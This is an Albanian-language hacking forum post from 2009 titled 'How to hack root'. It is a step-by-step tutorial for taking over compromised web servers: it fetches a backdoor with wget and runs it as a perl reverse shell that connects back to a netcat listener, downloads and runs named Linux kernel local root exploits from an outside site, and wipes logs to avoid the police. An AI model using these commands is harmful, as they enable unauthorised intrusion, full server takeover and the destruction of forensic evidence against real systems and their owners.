Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Si te hackojm r00t

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Si te hackojm r00t   Wed Dec 02, 2009 9:08 am

Si ta Hackojm root

Pik se pari

Cka eshte Root ?

Root thiret tash ne Standart nga krej user me Krejt te Drejtat
Ne Ndonje Sistem Pra Live me then si Pronari i Serverit

Si me e thy ate ku me gjet si me hy

Per ty hy me 1 root legal apo ilegal qe keni hack ju nevoitet PuTTy
mund te beni download Ketu
http://http://www.chiark.greenend.org.uk/~s.../download.html
http://http://www.tartarus.org/~simon/putty.../x86/putty.exe

Ku me e gjet 1 server qe ta hackerojm
Pasi qe e keni lexuar mesimin tim tjeter Si me Hack Uebfaqe me File Include
kur te hyni ne Server do tju nevoitet Backdoor per me e hack Rooten ne at
Uebfaqe qe e keni hack

Si ku dhe cka eshte Backdoor ?

backdoor eshte nje dritare e hapur nje lidhje pas me serverin qe mundeni me u kyq
me NETCAT!

Cka eshte Netcat ?

Netcat eshte nje program i vogel qe e leshon ne Pc me e prit 1 Lidhje nga backdoori pra e
Aktivizoni Netcat ne pc e juaj hyni ne webin qe e keni hack wget webi.com/backdoor
pastaj e leshoni " perl backdoor IPeJuaj porti " dhe backdoor scripti provon te lidhet
me Pc e juaj ne at portin qe e keni shenu ne NETCAT me e prit lidhjen Dhe lidheni me
Sistemin qe e keni hack pasi te lidheni

komanden: uname -a " e shikoni versionin e KERNEL te unix sistemit "

Nese eshte 2.4 - 2003 - 2004 - 2005 - perdoreni Exploitin lokal " uselib24 "
Nese eshte 2.3 ose me posht version i vitit 2003 perdoreni explotin lokal " w00t "

Si me i perdor exploitat ?

Exploitat mund ti gjeni Ketu:
http://http://xpl.by.ru/

per w00t si me e perdor ?
wget http://http://xpl.by.ru/w00t
chmod 777 w00t
./w00t " prisni pak "
dhe shkruani komanden: id
nese ju del : id (root)

Suksess e keni hack Rooten dhe mundeni me bo cka te doni.
------------
per uselib24
wget http://http://xpl.by.ru/uselib24
chmod 777 uselib24
./uselib24
Processon....
shkruan komanden: id
nese ju del : id (root)

Suksess e keni hack Rooten dhe mundeni me bo cka te doni.

keshtu edhe exploita tjer mundeni me provu 100% funksionon testuar nga une personalisht
keni edhe exploita tjer aty krad,krad2,krad3 ,ptrace24<< per 2.4 etc.

Pasi kemi hackeruar me kille a mos te na nxan POLICIA a ?
po skeni shanca bre kurva interneti ua qim policin e nanes ketu keni pun me
CrAcKeR-NiNi veprojme....
Fshirja e " LOGS "
wget http://http://xpl.by.ru/MSRLE.txt
chmod 777 MSRLE.txt
perl MSRLE.txt
-------

* !done all log files erased!
* -------
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Si te hackojm r00t
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Tutorials & Mësime-
Kërce tek: